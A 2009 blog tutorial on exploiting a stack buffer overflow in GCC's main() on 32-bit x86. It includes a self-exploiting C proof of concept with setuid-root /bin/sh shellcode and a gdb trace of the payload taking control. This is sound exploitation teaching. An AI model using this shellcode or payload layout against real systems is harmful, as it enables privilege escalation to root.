Sunday, December 13, 2009

Exploiting a Buffer Overflow in main()

A buffer overflow in main() is hard to imagine. I've never seen one myself, since main() usually delegates to other parts of a system very early on. Still, I noticed yesterday that GCC sets up main() a bit differently from other functions.

Take the following empty program as an example:
int func()
{
}

int main()
{
}

Compiling this without stack protection gives the following:
08048344 <func>:
 8048344: 55                    push   ebp
 8048345: 89 e5                 mov    ebp,esp
 8048347: 5d                    pop    ebp
 8048348: c3                    ret    

08048349 <main>:
 8048349: 8d 4c 24 04           lea    ecx,[esp+0x4]
 804834d: 83 e4 f0              and    esp,0xfffffff0
 8048350: ff 71 fc              push   DWORD PTR [ecx-0x4]
 8048353: 55                    push   ebp
 8048354: 89 e5                 mov    ebp,esp
 8048356: 51                    push   ecx
 8048357: 59                    pop    ecx
 8048358: 5d                    pop    ebp
 8048359: 8d 61 fc              lea    esp,[ecx-0x4]
 804835c: c3                    ret    
 804835d: 90                    nop    
 804835e: 90                    nop    
 804835f: 90                    nop    

A normal function, in its prologue, stores the caller's "ebp" on the stack and loads the current stack pointer (esp) into ebp. From there it uses "ebp" to address local variables and arguments. Before returning it restores the previous ebp. This means the last 8 bytes of the frame are [ebp:4][eip:4]: the epilogue pops the caller's "ebp", and the "ret" instruction then pops the new "eip" and continues execution there.

The main function on the other hand (I keep wanting to say "method" instead of "function" - I'm Java brainwashed) does it a bit differently. First it loads the address "esp + 4" into ecx. This is the address of the first argument, "int argc". Then it aligns the stack to a 16-byte boundary and pushes a copy of the original return address onto the realigned stack. Unless the last 4 bits of esp were already 0000b, the real return address now sits some distance above the new frame, so the copy presumably exists to keep the familiar [ebp][eip] layout intact, while ecx remembers where the original stack was. "main" returns to a function called __libc_start_main, the C library's bootstrapping function that calls main().

After this it's the normal ebp/esp business, plus saving the value of ecx on the stack, since any function called later is free to overwrite the register. In the example above, 0x8048357 is where the epilogue starts. It restores the values of ecx and ebp, and then comes the step that makes exploiting main() different: it sets the stack pointer (esp) to ecx - 4, which is what it was on entry into main, and only then returns. For an exploit this means the resulting value of "esp" must point to the new return address, which would probably be another stack address, filled with a payload.

Usually when you exploit a buffer overflow, you have a NOP sled, the shellcode and then a sequence of return addresses. Had you done this in a main function, esp would end up with the value of the return address minus 4, and the ret instruction would then try to jump to 0x90909090. This won't work for obvious reasons. You need to be very precise in setting up this buffer. First you have to supply an address, which gets loaded into "ecx". This address needs to be 4 bytes greater than the location where the real return address is stored.

These values will all be based around offsets from the return address. There are a few address padding techniques I've come up with to help increase the hit probability. They're all pretty similar, placing sequences of two addresses in different places. To keep this short, I'll explain the simplest of them.

The easiest can be used when you have a very large buffer. Assume the variable RET is the address of the start of the buffer, which is where the new return address will be read from. You then overwrite the end of the buffer with RET + 4 (the value destined for ecx), but instead of starting the buffer with a NOP sled, you first write X instances of RET + X * 4, which is the address of the NOP sled that follows them.

To demonstrate this I created a PoC. This program has a 1000 byte buffer in main(), and then sets up an exploit to spawn a shell and copies this into the buffer. So it exploits itself (wouldn't that be a dream - save the hackers some time and write the exploit before you ship your software).
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <error.h>   // error() is a GNU extension

#define BUFSIZE 1000
#define PAYLOADSIZE (BUFSIZE * 2)
#define SLEDSIZE 100
#define RETADDR_CNT 20

char shellcode[]=
  // setuid(0) + exec(/bin/sh)
  "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
  "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
  "\xe1\xcd\x80" // 35 bytes
  ;

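// round ptr up to the next 4-byte boundary
void *alignaddr(void *ptr)
{
  char *p = ptr;  // arithmetic on void* is a GNU extension, so use char*
  while ((long)p % 4) ++p;
  return p;
}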

void *setupExploit(void *bufaddr)
{
  long sled_addr, stack_addr;
  char *expldata = (char*)malloc(PAYLOADSIZE * sizeof(char));
  char *ptr = expldata;
  int i;

  if (ptr == NULL)
  {
    error(1, 0, "Failed to prepare payload");
  }

  ptr = alignaddr(ptr);

  // this is the address that will go into "ecx", and have 4 deducted
  // from it to get the new stack frame address
  stack_addr = (long)bufaddr + 4; 
  // this is the address where the NOP sled and shellcode will be
  sled_addr = (long)bufaddr + 4 * RETADDR_CNT;

  printf("Buf Addr: %p\n", bufaddr);
  printf("SLED Addr: %p\n", (void*)sled_addr);
  printf("Stack Addr: %p\n", (void*)stack_addr);

  // write the sled address to the beginning of the buffer
  for (i = 0; i < RETADDR_CNT; ++i)
  {
    *((long*)ptr) = sled_addr;
    ptr += 4;
  }

  // follow with a NOP sled
  for (i = 0; i < SLEDSIZE; ++i)
  {
    *ptr++ = 0x90;
  }

  // add the shellcode
  memcpy(ptr, shellcode, sizeof(shellcode));
  ptr += sizeof(shellcode);

  // align the address
  ptr = alignaddr(ptr);

  // and fill the remaining with the stack address
  while (ptr < expldata + PAYLOADSIZE)
  {
    *((long*)ptr) = stack_addr;
    ptr += 4;
  }

  return expldata;
}

int main(int argc, char **argv)
{
  char buf[BUFSIZE];
  char *expl;

  expl = setupExploit(buf);
  memcpy(buf, expl, PAYLOADSIZE);
}

Building and running this you will see something like:
quintin@quintin-laptop mainexpl $ gcc -fno-stack-protector -o mainexpl mainexpl.c 
quintin@quintin-laptop mainexpl $ sudo chown root:root mainexpl
quintin@quintin-laptop mainexpl $ sudo chmod u+s mainexpl
quintin@quintin-laptop mainexpl $ ./mainexpl 
Buf Addr: 0xbf9a48b8
SLED Addr: 0xbf9a4908
Stack Addr: 0xbf9a48bc
# id
uid=0(root) gid=1002(quintin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),33(www-data),44(video),46(plugdev),104(scanner),108(lpadmin),110(admin),115(netdev),117(powerdev),124(sambashare),1002(quintin)
# 

* To demonstrate this the program is built with stack protection turned off. This is the "-fno-stack-protector" argument given to gcc.

Taking into account the explanations from before, 0xbf9a48b8 is the address where our payload will go and 0xbf9a4908 is the address where the NOP sled and shellcode will actually start. Finally, 0xbf9a48bc is the value that the main() epilogue will pop into ecx. esp then becomes ecx - 4 = 0xbf9a48b8, which is where the first copy of the SLED address is stored.

In a bit more detail, let's run it through GDB. The disassembled main() function:
0804854b <main>:
 804854b: 8d 4c 24 04           lea    ecx,[esp+0x4]
 804854f: 83 e4 f0              and    esp,0xfffffff0
 8048552: ff 71 fc              push   DWORD PTR [ecx-0x4]
 8048555: 55                    push   ebp
 8048556: 89 e5                 mov    ebp,esp
 8048558: 51                    push   ecx
 8048559: 81 ec 04 04 00 00     sub    esp,0x404
 804855f: 8d 85 10 fc ff ff     lea    eax,[ebp-0x3f0]
 8048565: 89 04 24              mov    DWORD PTR [esp],eax
 8048568: e8 bf fe ff ff        call   804842c <setupExploit>
 804856d: 89 45 f8              mov    DWORD PTR [ebp-0x8],eax
 8048570: c7 44 24 08 d0 07 00  mov    DWORD PTR [esp+0x8],0x7d0
 8048577: 00 
 8048578: 8b 45 f8              mov    eax,DWORD PTR [ebp-0x8]
 804857b: 89 44 24 04           mov    DWORD PTR [esp+0x4],eax
 804857f: 8d 85 10 fc ff ff     lea    eax,[ebp-0x3f0]
 8048585: 89 04 24              mov    DWORD PTR [esp],eax
 8048588: e8 b7 fd ff ff        call   8048344 <memcpy@plt>
 804858d: 81 c4 04 04 00 00     add    esp,0x404
 8048593: 59                    pop    ecx
 8048594: 5d                    pop    ebp
 8048595: 8d 61 fc              lea    esp,[ecx-0x4]
 8048598: c3                    ret    

We'll put a breakpoint at the start of the epilogue (the pop ecx), i.e. 0x8048593.
quintin@quintin-laptop mainexpl $ gdb ./mainexpl
GNU gdb 6.8-debian
(gdb) break *0x8048593
Breakpoint 1 at 0x8048593
(gdb) run
Starting program: /home/quintin/tmp/notesearch/mainexpl 
Buf Addr: 0xbf9a48b8
SLED Addr: 0xbf9a4908
Stack Addr: 0xbf9a48bc

Breakpoint 1, 0x08048593 in main ()
Current language:  auto; currently asm
(gdb) i r ecx esp
ecx            0x0 0
esp            0xbf9a4ca4 0xbf9a4ca4
(gdb) x/8xw $esp
0xbf9a4ca4: 0xbf9a48bc 0xbf9a48bc 0xbf9a48bc 0xbf9a48bc
0xbf9a4cb4: 0xbf9a48bc 0xbf9a48bc 0xbf9a48bc 0xbf9a48bc
(gdb) 

As you can see, the value of ecx is 0 and our new stack address is all over the current stack. Let's step through the "pop ecx" instruction and see what we have then.
(gdb) stepi
0x08048594 in main ()
(gdb) i r ecx esp
ecx            0xbf9a48bc -1080407876
esp            0xbf9a4ca8 0xbf9a4ca8
(gdb) 

We don't care about ebp, so let's skip ahead two instructions and see what happens once the new stack address is loaded.
(gdb) stepi
0x08048595 in main ()
(gdb) stepi
0x08048598 in main ()
(gdb) i r ecx esp
ecx            0xbf9a48bc -1080407876
esp            0xbf9a48b8 0xbf9a48b8
(gdb) x/4xw $esp
0xbf9a48b8: 0xbf9a4908 0xbf9a4908 0xbf9a4908 0xbf9a4908
(gdb) 

So the stack pointer now points to where we put our return addresses. The next instruction to be executed is "ret", which will set the eip register to 0xbf9a4908, where our NOP sled and shellcode are, as can be seen with:
(gdb) x/10i 0xbf9a4908
0xbf9a4908: nop    
0xbf9a4909: nop    
0xbf9a490a: nop    
0xbf9a490b: nop    
0xbf9a490c: nop    
0xbf9a490d: nop    
0xbf9a490e: nop    
0xbf9a490f: nop    
0xbf9a4910: nop    
0xbf9a4911: nop    
(gdb) x/20i 0xbf9a4908+97
0xbf9a4969: nop    
0xbf9a496a: nop    
0xbf9a496b: nop    
0xbf9a496c: xor    eax,eax
0xbf9a496e: xor    ebx,ebx
0xbf9a4970: xor    ecx,ecx
0xbf9a4972: cdq    
0xbf9a4973: mov    al,0xa4
0xbf9a4975: int    0x80
0xbf9a4977: push   0xb
0xbf9a4979: pop    eax
0xbf9a497a: push   ecx
0xbf9a497b: push   0x68732f2f
0xbf9a4980: push   0x6e69622f
0xbf9a4985: mov    ebx,esp
0xbf9a4987: push   ecx
0xbf9a4988: mov    edx,esp
0xbf9a498a: push   ebx
0xbf9a498b: mov    ecx,esp
0xbf9a498d: int    0x80
(gdb) 

The next step will be to execute the "ret", and start executing the shellcode:
(gdb) continue
Continuing.
Executing new program: /bin/dash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
$ 


And that's one way of exploiting a stack overflow in main(). With a small buffer you need high precision, but you could put the return address 2 words after the new stack address. Or you could put the shellcode somewhere else and use this buffer purely for addressing. Many things are possible, and every scenario is unique.
